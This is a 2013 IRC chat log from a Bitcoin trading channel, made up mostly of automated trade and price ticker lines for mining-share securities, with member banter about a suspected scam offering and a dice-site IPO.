[BTCTC] [ACTIVEMINING] 100 @ 0.005096 = 0.5096 BTC [+] Sep 05 04:19:56 [BTCTC] [LABCOIN] 189 @ 0.003519 = 0.6651 BTC [+] Sep 05 04:20:30 [BTCTC] [LABCOIN] 401 @ 0.0035 = 1.4035 BTC [-] Sep 05 04:21:58 [BTCTC] [ACTIVEMINING] 10 @ 0.005001 = 0.05 BTC [-] Sep 05 04:22:19 [BTCTC] [ACTIVEMINING] 110 @ 0.005 = 0.55 BTC [-] Sep 05 04:22:33 [HAVELOCK] [AM100] 2 @ 0.02265 = 0.0453 BTC [-] Sep 05 04:22:57 o Sep 05 04:25:55 [BTCTC] [ACTIVEMINING] 48 @ 0.004919 = 0.2361 BTC [-] Sep 05 04:25:57 [BTCTC] [ACTIVEMINING] 20 @ 0.004812 = 0.0962 BTC [-] Sep 05 04:25:59 [BTCTC] [ACTIVEMINING] 250 @ 0.004812 = 1.203 BTC [-] Sep 05 04:26:00 [BTCTC] [ACTIVEMINING] 510 @ 0.00481 = 2.4531 BTC [-] Sep 05 04:26:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02348 BTC [-] Sep 05 04:27:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.02291 = 0.0458 BTC [-] Sep 05 04:27:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.0229 = 0.229 BTC [-] Sep 05 04:27:28 [BTCTC] [TAT.ASICMINER] 6 @ 0.02281 = 0.1369 BTC [-] Sep 05 04:27:29 [BTCTC] [TAT.ASICMINER] 33 @ 0.0228 = 0.7524 BTC [-] Sep 05 04:27:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0227 BTC [-] Sep 05 04:27:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0225 = 0.045 BTC [-] Sep 05 04:27:32 [BTCTC] [LABCOIN] 3 @ 0.003519 = 0.0106 BTC [+] Sep 05 04:27:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0224 BTC [-] Sep 05 04:27:34 [BTCTC] [LABCOIN] 3 @ 0.00352 = 0.0106 BTC [+] Sep 05 04:27:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.02232 = 0.1562 BTC [-] Sep 05 04:27:37 [BTCTC] [LABCOIN] 283 @ 0.003545 = 1.0032 BTC [+] Sep 05 04:27:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02231 = 0.1116 BTC [-] Sep 05 04:27:39 [BTCTC] [LABCOIN] 283 @ 0.003546 = 1.0035 BTC [+] Sep 05 04:27:39 [BTCTC] [LABCOIN] 524 @ 0.00355 = 1.8602 BTC [+] Sep 05 04:27:40 [BTCTC] [LABCOIN] 4 @ 0.003551 = 0.0142 BTC [+] Sep 05 04:27:49 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] Sep 05 04:28:26 [BTCTC] [LABCOIN] 221 @ 0.00355 = 0.7846 BTC [-] Sep 05 04:28:27 [BTCTC] [LABCOIN] 221 @ 0.003551 = 0.7848 BTC [+] Sep 05 04:28:28 [BTCTC] [LABCOIN] 162 @ 0.003554 = 0.5757 BTC [+] Sep 05 04:28:30 [BTCTC] [LABCOIN] 162 @ 0.003555 = 0.5759 BTC [+] Sep 05 04:28:31 [BTCTC] [LABCOIN] 78 @ 0.003584 = 0.2796 BTC [+] Sep 05 04:28:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.02348 BTC [+] Sep 05 04:29:07 [HAVELOCK] [LABCO] 5 @ 0.00359 = 0.018 BTC [-] Sep 05 04:29:17 [BTCTC] [ACTIVEMINING] 245 @ 0.004977 = 1.2194 BTC [+] Sep 05 04:29:18 [BTCTC] [ACTIVEMINING] 65 @ 0.00498 = 0.3237 BTC [+] Sep 05 04:29:40 [BTCTC] [ASICMINER-PT] 4 @ 2.4 = 9.6 BTC [-] Sep 05 04:29:40 [BTCTC] [ASICMINER-PT] 3 @ 2.397 = 7.191 BTC [-] Sep 05 04:30:05 [HAVELOCK] [LABCO] 482 @ 0.00359 = 1.7304 BTC [-] Sep 05 04:30:08 [BTCTC] [ACTIVEMINING] 694 @ 0.004976 = 3.4533 BTC [-] Sep 05 04:30:42 [BTCTC] [LABCOIN] 299 @ 0.003579 = 1.0701 BTC [-] Sep 05 04:30:43 [BTCTC] [LABCOIN] 299 @ 0.003581 = 1.0707 BTC [+] Sep 05 04:30:45 [BTCTC] [LABCOIN] 529 @ 0.003617 = 1.9134 BTC [+] Sep 05 04:30:46 [BTCTC] [LABCOIN] 432 @ 0.003618 = 1.563 BTC [+] Sep 05 04:30:47 [BTCTC] [LABCOIN] 97 @ 0.003619 = 0.351 BTC [+] Sep 05 04:30:48 [BTCTC] [LABCOIN] 2755 @ 0.003637 = 10.0199 BTC [+] Sep 05 04:32:12 [BTCTC] [ASICMINER-PT] 1 @ 2.395 BTC [-] Sep 05 04:32:13 [HAVELOCK] [AM100] 8 @ 0.02265 = 0.1812 BTC [-] Sep 05 04:32:21 [BTCTC] [ACTIVEMINING] 346 @ 0.004768 = 1.6497 BTC [-] Sep 05 04:32:22 [BTCTC] [LABCOIN] 244 @ 0.003633 = 0.8865 BTC [-] Sep 05 04:32:23 [BTCTC] [ACTIVEMINING] 86 @ 0.004765 = 0.4098 BTC [-] Sep 05 04:32:25 [BTCTC] [ACTIVEMINING] 274 @ 0.004762 = 1.3048 BTC [-] Sep 05 04:32:26 [BTCTC] [LABCOIN] 55 @ 0.003635 = 0.1999 BTC [+] Sep 05 04:32:27 [BTCTC] [ACTIVEMINING] 700 @ 0.004761 = 3.3327 BTC [-] Sep 05 04:32:28 [BTCTC] [ACTIVEMINING] 188 @ 0.00476 = 0.8949 BTC [-] Sep 05 04:34:12 [BTCTC] [ACTIVEMINING] 480 @ 0.00497 = 2.3856 BTC [+] Sep 05 04:35:48 [BTCTC] [LABCOIN] 210 @ 0.00363 = 0.7623 BTC [-] Sep 05 04:35:50 [BTCTC] [LABCOIN] 210 @ 0.003632 = 0.7627 BTC [+] Sep 05 04:35:51 [BTCTC] [LABCOIN] 1520 @ 0.003638 = 5.5298 BTC [+] Sep 05 04:35:52 [BTCTC] [LABCOIN] 1235 @ 0.003638 = 4.4929 BTC [+] Sep 05 04:36:56 ;;ticker Sep 05 04:36:57 MtGox BTCUSD ticker | Best bid: 128.00000, Best ask: 128.99500, Bid-ask spread: 0.99500, Last trade: 128.99500, 24 hour volume: 33882.30530151, 24 hour low: 127.30000, 24 hour high: 145.80000, 24 hour vwap: 135.69466 Sep 05 04:37:35 [BTCTC] [LABCOIN] 181 @ 0.003634 = 0.6578 BTC [-] Sep 05 04:42:22 [BTCTC] [ACTIVEMINING] 258 @ 0.005077 = 1.3099 BTC [+] Sep 05 04:42:23 [BTCTC] [ACTIVEMINING] 242 @ 0.00508 = 1.2294 BTC [+] Sep 05 04:42:34 [BTCTC] [LABCOIN] 1 @ 0.003625 BTC [-] Sep 05 04:42:56 [BTCTC] [TAT.ASICMINER] 29 @ 0.02348 = 0.6809 BTC [+] Sep 05 04:42:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.02349 = 0.2584 BTC [+] Sep 05 04:44:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.02349 = 0.2349 BTC [+] Sep 05 04:45:07 [BTCTC] [LABCOIN] 113 @ 0.003588 = 0.4054 BTC [-] Sep 05 04:45:30 [BTCTC] [ASICMINER-PT] 10 @ 2.41 = 24.1 BTC [+] Sep 05 04:45:40 [BTCTC] [BASIC-MINING] 9 @ 0.1493 = 1.3437 BTC [+] Sep 05 04:47:50 oh wow prices is adjusting properly Sep 05 04:47:51 finally Sep 05 04:47:53 ;;ticker Sep 05 04:47:54 MtGox BTCUSD ticker | Best bid: 128.40000, Best ask: 128.70000, Bid-ask spread: 0.30000, Last trade: 128.40000, 24 hour volume: 34285.14839462, 24 hour low: 127.30000, 24 hour high: 145.80000, 24 hour vwap: 135.58276 Sep 05 04:49:44 [BTCTC] [BASIC-MINING] 2 @ 0.149 = 0.298 BTC [-] Sep 05 04:50:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.02349 = 0.094 BTC [+] Sep 05 04:50:09 [BTCTC] [TAT.ASICMINER] 16 @ 0.0235 = 0.376 BTC [+] Sep 05 04:52:55 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [+] Sep 05 04:53:10 [BTCTC] [BTC-GROWTH] 1 @ 0.09901 BTC [-] Sep 05 04:53:11 [BTCTC] [BTC-GROWTH] 4 @ 0.099 = 0.396 BTC [-] Sep 05 04:53:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.02234 = 0.067 BTC [-] Sep 05 04:53:26 [BTCTC] [TAT.ASICMINER] 15 @ 0.02233 = 0.335 BTC [-] Sep 05 04:53:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.02232 = 0.067 BTC [-] Sep 05 04:53:28 [BTCTC] [TAT.ASICMINER] 19 @ 0.02231 = 0.4239 BTC [-] Sep 05 04:53:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.02223 = 0.0889 BTC [-] Sep 05 04:53:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.02222 BTC [-] Sep 05 04:53:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.02222 = 0.0889 BTC [-] Sep 05 04:53:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.02222 = 0.0889 BTC [-] Sep 05 04:53:33 [BTCTC] [TAT.ASICMINER] 11 @ 0.02222 = 0.2444 BTC [-] Sep 05 04:53:35 [BTCTC] [TAT.ASICMINER] 19 @ 0.02221 = 0.422 BTC [-] Sep 05 04:53:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.0222 = 0.0666 BTC [-] Sep 05 04:53:36 [BTCTC] [TAT.ASICMINER] 95 @ 0.0222 = 2.109 BTC [-] Sep 05 04:53:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.02211 = 0.199 BTC [-] Sep 05 04:53:38 [BTCTC] [TAT.ASICMINER] 41 @ 0.0221 = 0.9061 BTC [-] Sep 05 04:53:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0221 = 0.0884 BTC [-] Sep 05 04:53:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0221 BTC [-] Sep 05 04:53:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02203 = 0.0661 BTC [-] Sep 05 04:53:43 [BTCTC] [TAT.ASICMINER] 50 @ 0.02202 = 1.101 BTC [-] Sep 05 04:53:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.02202 = 0.2202 BTC [-] Sep 05 04:53:44 [BTCTC] [TAT.ASICMINER] 31 @ 0.02202 = 0.6826 BTC [-] Sep 05 04:53:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.02201 = 0.1101 BTC [-] Sep 05 04:53:46 [BTCTC] [TAT.ASICMINER] 100 @ 0.02201 = 2.201 BTC [-] Sep 05 04:53:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.022 = 0.11 BTC [-] Sep 05 04:53:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.022 BTC [-] Sep 05 04:53:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.022 = 0.066 BTC [-] Sep 05 04:53:50 [BTCTC] [TAT.ASICMINER] 32 @ 0.022 = 0.704 BTC [-] Sep 05 04:53:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.022 = 0.22 BTC [-] Sep 05 04:53:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.02153 = 0.4306 BTC [-] Sep 05 04:53:53 [BTCTC] [TAT.ASICMINER] 100 @ 0.02152 = 2.152 BTC [-] Sep 05 04:53:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.02151 = 0.086 BTC [-] Sep 05 04:53:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0215 = 0.215 BTC [-] Sep 05 04:53:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0215 = 0.215 BTC [-] Sep 05 04:53:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.02104 = 0.0842 BTC [-] Sep 05 04:53:58 [BTCTC] [ASICMINER-PT] 1 @ 2.432 BTC [+] Sep 05 04:53:59 [BTCTC] [TAT.ASICMINER] 47 @ 0.02103 = 0.9884 BTC [-] Sep 05 04:54:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.021 = 0.042 BTC [-] Sep 05 04:54:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.021 = 0.042 BTC [-] Sep 05 04:54:02 [BTCTC] [TAT.ASICMINER] 300 @ 0.021 = 6.3 BTC [-] Sep 05 04:54:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.02081 = 0.2081 BTC [-] Sep 05 04:54:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0208 BTC [-] Sep 05 04:54:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.0205 = 0.123 BTC [-] Sep 05 04:54:21 [BTCTC] [ASICMINER-PT] 1 @ 2.437 BTC [+] Sep 05 04:54:27 uh huh fun https://bitcointalk.org/index.php?topic=288036.0 Sep 05 04:54:40 9996 btc to go Sep 05 04:55:40 “A better investment than ASIC chips!” Sep 05 04:55:56 Tom Ford Sep 05 04:55:56 technically true, even if it's a scam Sep 05 04:56:03 Izod Sep 05 04:56:05 hehe Sep 05 04:56:09 [BTCTC] [LABCOIN] 10 @ 0.00355 = 0.0355 BTC [-] Sep 05 04:56:10 [BTCTC] [LABCOIN] 14 @ 0.00355 = 0.0497 BTC [-] Sep 05 04:56:19 [BTCTC] [LABCOIN] 280 @ 0.003571 = 0.9999 BTC [+] Sep 05 04:56:20 [BTCTC] [ASICMINER-PT] 1 @ 2.437 BTC [+] Sep 05 04:56:22 [BTCTC] [LABCOIN] 140 @ 0.003587 = 0.5022 BTC [+] Sep 05 04:56:23 [BTCTC] [LABCOIN] 1179 @ 0.003589 = 4.2314 BTC [+] Sep 05 04:56:39 whoa. so basically super long variant of the "please sent btc to this address" scam Sep 05 04:56:42 "reasons to invest" … "We are professionals" Sep 05 04:56:53 iiincredible. Sep 05 04:57:11 wow I have achieved fame, I have "12-18 ignores" Sep 05 04:57:35 nobody ignores me :( Sep 05 04:57:42 you don't post enough Sep 05 04:57:51 no u Sep 05 04:57:51 i think the girl has like 50 Sep 05 04:58:09 that's it? eh Sep 05 04:58:23 [BTCTC] [ASICMINER-PT] 2 @ 2.436 = 4.872 BTC [-] Sep 05 04:58:24 [BTCTC] [ASICMINER-PT] 1 @ 2.437 BTC [+] Sep 05 04:58:25 i thought it was over 9k Sep 05 04:58:25 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [+] Sep 05 04:58:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.02347 = 0.2816 BTC [+] Sep 05 04:58:37 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [+] Sep 05 04:59:25 how can you even tell does it say anywhere? Sep 05 04:59:41 mircea_popescu: I challenge the girl to a rap battle. Sep 05 05:00:42 it shows up there, but only if you have enough: http://i.imgur.com/XjIlQnd.png Sep 05 05:03:42 [BTCTC] [ACTIVEMINING] 40 @ 0.004828 = 0.1931 BTC [-] Sep 05 05:07:03 [BTCTC] [ACTIVEMINING] 40 @ 0.005029 = 0.2012 BTC [+] Sep 05 05:08:54 ;;nethash Sep 05 05:08:55 690072.666542 Sep 05 05:09:05 heh Sep 05 05:09:13 ;;bcstats Sep 05 05:09:16 Current Blocks: 256174 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 1873 blocks | Next Difficulty In About: 1 week, 4 days, 1 hour, 59 minutes, and 17 seconds | Next Difficulty Estimate: 95097197.3452 | Estimated Percent Change: 9.39134 Sep 05 05:10:06 [HAVELOCK] [AM1] 4 @ 2.35 = 9.4 BTC [-] Sep 05 05:11:01 [HAVELOCK] [LABCO] 1 @ 0.00359 BTC [-] Sep 05 05:12:16 [HAVELOCK] [AM1] 4 @ 2.35 = 9.4 BTC [-] Sep 05 05:14:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.0215 = 0.258 BTC [-] Sep 05 05:15:19 [BTCTC] [LABCOIN] 78 @ 0.003557 = 0.2774 BTC [-] Sep 05 05:15:50 ;;ticker Sep 05 05:15:50 MtGox BTCUSD ticker | Best bid: 127.63001, Best ask: 128.12000, Bid-ask spread: 0.48999, Last trade: 127.63001, 24 hour volume: 34857.49389354, 24 hour low: 127.24164, 24 hour high: 145.80000, 24 hour vwap: 135.44027 Sep 05 05:15:54 nice Sep 05 05:19:03 [HAVELOCK] [XBOND] 3 @ 0.00112 = 0.0034 BTC [+] Sep 05 05:22:51 someone just dropped 4500btc into the letsdice ipo .. Sep 05 05:24:01 [BTCTC] [ASICMINER-PT] 1 @ 2.437 BTC [-] Sep 05 05:24:29 What's the letsdice IPO? Sep 05 05:24:37 https://letsdice.com/ipo-doc.html Sep 05 05:24:39 LETSDICE.com IPO Prospectus Sep 05 05:25:56 What kind of fool do that? Sep 05 05:25:59 https://blockchain.info/address/1Nq5CJduAmzxxm2bG9nAPXZUcgi1hRFi5z Sep 05 05:26:04 Bitcoin Address 1Nq5CJduAmzxxm2bG9nAPXZUcgi1hRFi5z Sep 05 05:26:13 Public Note: celeste - the just-dice gambler? Sep 05 05:26:22 [BTCTC] [TAT.ASICMINER] 27 @ 0.0215 = 0.5805 BTC [-] Sep 05 05:26:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.0215 = 0.215 BTC [-] Sep 05 05:26:25 [BTCTC] [TAT.ASICMINER] 11 @ 0.02102 = 0.2312 BTC [-] Sep 05 05:26:32 4500 BTC for how much percentage? Sep 05 05:26:51 ~45% Sep 05 05:27:21 my guess is its prearanged Sep 05 05:27:44 45% of total? Sep 05 05:27:57 oh Sep 05 05:28:01 1.98% house edge Sep 05 05:28:09 but they want to pay 1% Sep 05 05:28:23 10000 BTC for 100% of 1% Sep 05 05:28:26 of wagers Sep 05 05:29:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02329 = 0.0466 BTC [+] Sep 05 05:30:41 they need an ipo why? Sep 05 05:30:58 Is the website even functional or it's just screenshots? Sep 05 05:30:58 have a bank to bet against? Sep 05 05:31:20 10000 BTC for nothing and no userbase? Sep 05 05:31:27 I asked, he said there will be a public beta Sep 05 05:31:36 but I don't see why he would IPO before that Sep 05 05:31:57 SatoshiDice was sold for like 120'000 BTC Sep 05 05:32:06 1/12th of SatoshiDice's value? Sep 05 05:32:14 For something with nothing? Sep 05 05:32:23 Just a new user on the forum and a domain? Sep 05 05:32:38 yep :/ Sep 05 05:32:45 WHAT KIND OF UNIVERSE HAVE I STEPPED IN?!? Sep 05 05:32:50 HALP! Sep 05 05:33:36 but I thought investment bubbles were the fed's fault :p Sep 05 05:34:04 [BTCTC] [LABCOIN] 16 @ 0.003564 = 0.057 BTC [+] Sep 05 05:34:05 [BTCTC] [LABCOIN] 8 @ 0.003565 = 0.0285 BTC [+] Sep 05 05:34:06 Seriously, all these IPOs... Sep 05 05:34:06 [BTCTC] [LABCOIN] 80 @ 0.003567 = 0.2854 BTC [+] Sep 05 05:34:07 [BTCTC] [LABCOIN] 40 @ 0.003568 = 0.1427 BTC [+] Sep 05 05:34:08 [BTCTC] [LABCOIN] 156 @ 0.003589 = 0.5599 BTC [+] Sep 05 05:34:11 Namworld i find it quite entertaining. Sep 05 05:34:38 people... well, "people" are exploring the dynamics of trust. Sep 05 05:34:50 In a few months people will have lost more in combined fraudulent/bad IPOs than Pirate ever made away with. Sep 05 05:35:03 put together the general ideology that everyone's equal with Bitcoin allowing anyone to fake numbers. you get some pretty lulzy stuff. Sep 05 05:35:13 i guess we'll have the 1st 1mn BTC ipo this year. Sep 05 05:35:21 thoroughly fake, but why wait for the real deal ? Sep 05 05:36:18 that's because no one wants to work for money Sep 05 05:36:26 don't you have a quote involving that? Sep 05 05:36:43 thestringpuller it's okay tho, everyone's more than welcome to starve while pushing their dreams. Sep 05 05:36:50 if you don't have money you either a. don't deserve it, b. don't know how to apply for money, or c. both Sep 05 05:36:51 They priced their thing too much. Sep 05 05:37:00 but it's like the broke college student who can't deal dope Sep 05 05:37:04 [BTCTC] [ACTIVEMINING] 5 @ 0.005008 = 0.025 BTC [-] Sep 05 05:37:11 and then complains he's broke because he's incompetent at selling a product that sells itself Sep 05 05:37:16 Like 10x too much minimum Sep 05 05:37:21 i am actually looking forward to the 1st ipo that will supposedly collect more than the total liquid btc. Sep 05 05:37:27 1000 BTC should be enough for 100% Sep 05 05:37:28 my bet is that it'll happen on btct. Sep 05 05:37:32 Assuming they're even legit Sep 05 05:37:44 now that I have seen just-dice I don't shares make sense Sep 05 05:38:06 Just-Dice is because people trust dooglus Sep 05 05:38:18 +think Sep 05 05:38:20 and under the Just-Dice model, they can retrieve 100% of their investment Sep 05 05:38:30 It's not shares Sep 05 05:38:31 yes, that's why it's so much better Sep 05 05:38:46 Hence the increased amount invested Sep 05 05:38:46 pankkake the just-dice model has but one fatal flaw : Sep 05 05:38:54 there's no way to turn your btc dust into infinity btc. Sep 05 05:39:00 But Dooglus gets almost nothing Sep 05 05:39:02 whereas that's what people are after. Sep 05 05:39:05 :) Sep 05 05:39:21 Namworld iirc they moved his fee to 10% or something Sep 05 05:39:37 yeah… well I had bad timing with JD too also Sep 05 05:39:54 but overall stuff like bonds have been very profitable Sep 05 05:40:03 It's still 10% of 1% of waggers Sep 05 05:40:16 well yeah Sep 05 05:40:19 so 0.1% of waggers Sep 05 05:40:24 It's not awful but anyway Sep 05 05:40:50 seems reasonable imo Sep 05 05:42:18 Just-Dice is making too much volume tho Sep 05 05:42:28 too much? Sep 05 05:42:40 Coinroll wants some love too Sep 05 05:42:43 lol Sep 05 05:42:45 lol Sep 05 05:42:51 Namworld: what is the primary form of income from NamWorld.net? Sep 05 05:42:55 [BTCTC] [LTC-ATF.B2] 1 @ 0.01047 BTC [+] Sep 05 05:42:57 Sorry it's off topic Sep 05 05:43:10 Hosting Sep 05 05:43:26 "website's, web design, online advertising, seo services, photography, internet & video marketing" Sep 05 05:43:30 did the kid leave anything out ? Sep 05 05:43:31 lol you're selling facebook likes Sep 05 05:43:35 [HAVELOCK] [HIM] 1 @ 0.15 BTC [+] Sep 05 05:43:42 no dental works. Sep 05 05:43:53 lol I was just wondering Sep 05 05:43:54 [BTCTC] [ACTIVEMINING] 472 @ 0.004999 = 2.3595 BTC [-] Sep 05 05:43:55 [BTCTC] [ACTIVEMINING] 10 @ 0.004999 = 0.05 BTC [-] Sep 05 05:43:55 [BTCTC] [ACTIVEMINING] 515 @ 0.005 = 2.575 BTC [+] Sep 05 05:43:56 I need a dentist who accepts bitcoins :/ Sep 05 05:43:56 lol Sep 05 05:43:59 <[\\\]> Namworld, have you viewed your site in chrome? Sep 05 05:44:01 <[\\\]> it looks crappy Sep 05 05:44:09 whoa look! [\\\] lives!@ Sep 05 05:44:10 <[\\\]> the buttons are hidden behind the divs Sep 05 05:44:18 <[\\\]> mircea_popescu: eat shit and die. Sep 05 05:44:26 <[\\\]> oops, forgot the comma Sep 05 05:44:32 I do dental works with a sledgehammer, if you sign a responsibility discharge Sep 05 05:44:35 lol what's that all about Sep 05 05:44:43 <[\\\]> eat, shit and die Sep 05 05:44:48 <[\\\]> see how that works? ;-) Sep 05 05:44:52 [BTCTC] [ACTIVEMINING] 1 @ 0.005 BTC [+] Sep 05 05:44:54 without shit, a man, is nothing. Sep 05 05:45:12 i thought it was balls Sep 05 05:45:16 balls, not shit. Sep 05 05:45:34 <[\\\]> yeah, I'd miss my balls. Sep 05 05:45:48 kakobrekla https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-frc1/23543_307573221727_6523441_n.jpg Sep 05 05:45:51 [HAVELOCK] [SMG] 1 @ 0.00019 BTC [-] Sep 05 05:45:53 [HAVELOCK] [SMG] 150 @ 0.00019 = 0.0285 BTC [-] Sep 05 05:45:56 [HAVELOCK] [SMG] 180 @ 0.00018005 = 0.0324 BTC [-] Sep 05 05:45:58 [HAVELOCK] [SMG] 33 @ 0.00018001 = 0.0059 BTC [-] Sep 05 05:46:00 [HAVELOCK] [SMG] 50 @ 0.00018 = 0.009 BTC [-] Sep 05 05:46:02 [HAVELOCK] [SMG] 700 @ 0.0001726 = 0.1208 BTC [-] Sep 05 05:46:22 Used to look fine. Wonder what happened Sep 05 05:46:22 hehe Sep 05 05:47:17 Namworld: at that point I'm ready for anything Sep 05 05:47:27 remove all my teeth if I can feel better Sep 05 05:48:40 [HAVELOCK] [VTX] 5 @ 0.6038899 = 3.0194 BTC [-] Sep 05 05:48:46 <[\\\]> see you all in another few weeks Sep 05 05:49:32 [BTCTC] [ACTIVEMINING] 10 @ 0.004999 = 0.05 BTC [-] Sep 05 05:49:34 [BTCTC] [ACTIVEMINING] 350 @ 0.005 = 1.75 BTC [+] Sep 05 05:51:13 [BTCTC] [BITVPS] 1 @ 0.002447 BTC [-] Sep 05 05:51:25 [HAVELOCK] [AM100] 7 @ 0.022 = 0.154 BTC [-] Sep 05 05:51:25 [HAVELOCK] [AM100] 10 @ 0.02172 = 0.2172 BTC [-] Sep 05 05:51:25 [HAVELOCK] [AM100] 22 @ 0.021711 = 0.4776 BTC [-] Sep 05 05:53:41 [BTCTC] [DMS.SELLING] 2 @ 0.01314 = 0.0263 BTC [+] Sep 05 05:55:42 [HAVELOCK] [DEALCO] 5 @ 0.013205 = 0.066 BTC [-] Sep 05 05:55:56 [BTCTC] [DMS.MINING] 5 @ 0.002485 = 0.0124 BTC [+] Sep 05 05:56:14 [HAVELOCK] [LABCO] 9 @ 0.0035 = 0.0315 BTC [-] Sep 05 05:57:02 [HAVELOCK] [XBOND] 30 @ 0.00112 = 0.0336 BTC [+] Sep 05 05:58:54 [BTCTC] [TAT.ASICMINER] 22 @ 0.02293 = 0.5045 BTC [-] Sep 05 06:01:01 [MPEX] [S.MPOE] 3600 @ 0.00087778 = 3.16 BTC [-] Sep 05 06:04:38 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [-] Sep 05 06:04:39 [BTCTC] [ASICMINER-PT] 1 @ 2.436 BTC [+] Sep 05 06:04:41 [BTCTC] [ASICMINER-PT] 3 @ 2.438 = 7.314 BTC [+] Sep 05 06:07:54 I fixed my CSS Sep 05 06:08:33 looks like Chrome updated and idk, found another CSS fix. This one is better and still supports old browsers it seems Sep 05 06:08:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.02288 = 0.2059 BTC [-] Sep 05 06:08:58 [BTCTC] [ACTIVEMINING] 5 @ 0.004999 = 0.025 BTC [-] Sep 05 06:08:59 [BTCTC] [ACTIVEMINING] 17 @ 0.005 = 0.085 BTC [+] Sep 05 06:09:10 [BTCTC] [ASICMINER-PT] 1 @ 2.41 BTC [-] Sep 05 06:09:25 [BTCTC] [ACTIVEMINING] 1 @ 0.005 BTC [+] Sep 05 06:09:41 [BTCTC] [TAT.ASICMINER] 38 @ 0.02288 = 0.8694 BTC [-] Sep 05 06:09:43 [BTCTC] [TAT.ASICMINER] 28 @ 0.02289 = 0.6409 BTC [+] Sep 05 06:10:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02288 = 0.2288 BTC [-] Sep 05 06:10:16 [BTCTC] [TAT.ASICMINER] 15 @ 0.02299 = 0.3449 BTC [+] Sep 05 06:10:40 [BTCTC] [TAT.ASICMINER] 15 @ 0.0229 = 0.3435 BTC [-] Sep 05 06:10:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.02288 = 0.1144 BTC [-] Sep 05 06:10:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.02241 = 0.0672 BTC [-] Sep 05 06:10:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.0224 = 0.112 BTC [-] Sep 05 06:10:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.0224 = 0.112 BTC [-] Sep 05 06:12:16 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0005112 = 0.0041 BTC [+] Sep 05 06:12:16 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0005102 = 0.0026 BTC [-] Sep 05 06:12:18 [BTCTC] [TAT.VIRTUALMINE] 304 @ 0.00051 = 0.155 BTC [-] Sep 05 06:12:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000508 BTC [-] Sep 05 06:12:20 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.000505 = 0.0167 BTC [-] Sep 05 06:12:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0005005 BTC [-] Sep 05 06:12:23 [BTCTC] [TAT.VIRTUALMINE] 130 @ 0.0005002 = 0.065 BTC [-] Sep 05 06:12:24 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0005001 = 0.025 BTC [-] Sep 05 06:12:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0005 BTC [-] Sep 05 06:12:26 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00048 = 0.0048 BTC [-] Sep 05 06:12:27 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.000412 = 0.0041 BTC [-] Sep 05 06:13:13 [BTCTC] [TAT.VIRTUALMINE] 75 @ 0.000411 = 0.0308 BTC [-] Sep 05 06:15:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.0224 = 0.112 BTC [-] Sep 05 06:15:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.0223 = 0.1115 BTC [-] Sep 05 06:15:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.02221 BTC [-] Sep 05 06:15:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.0222 = 0.111 BTC [-] Sep 05 06:15:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.02211 BTC [-] Sep 05 06:15:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0221 = 0.0663 BTC [-] Sep 05 06:15:57 